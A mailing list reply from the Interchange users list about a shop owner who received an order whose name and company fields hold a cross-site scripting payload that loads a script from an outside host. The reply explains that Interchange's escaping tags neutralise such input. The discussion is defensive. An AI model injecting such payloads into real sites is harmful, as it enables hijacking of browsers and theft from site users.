[ic] xss issue?
Josh Lavin
jlavin at endpoint.com
Thu Sep 15 17:49:43 UTC 2016
Quoting DB (db at m-and-d.com):
> I received an order with stuff like this
>
> Name: Linda Juan">script src=//xss.re/692>/script>
> Company: ">script src=//xss.re/692>/script>
> Email address: juanlinda123 at gmail.com
>
> I'm using 5.10 and a modified foundation. The payment method was
> check/money order. I'm hoping to prevent this of course. Adding a
> [filter] to input fields on the order form is the first thing that comes
> to mind. Is that a reasonable solution?
Actually, if your order report email is using the [value] tags, it
automatically escapes HTML.
See the last section on this page:
http://www.icdevgroup.org/interchange-doc-5.2.0/frames/ictags_120.html
For reference, here is the default Strap order report:
https://github.com/interchange/interchange/blob/master/dist/strap/etc/report
You may need to compare to what your site is using.
Using [value] will prevent XSS, but to prevent the submissions
altogether is another story... You'd probably need to have an "online"
check payment option, so that at least the orders that make it through
would be using a real bank account (or a stolen one!).
--
Josh Lavin
End Point Corporation
More information about the interchange-users
mailing list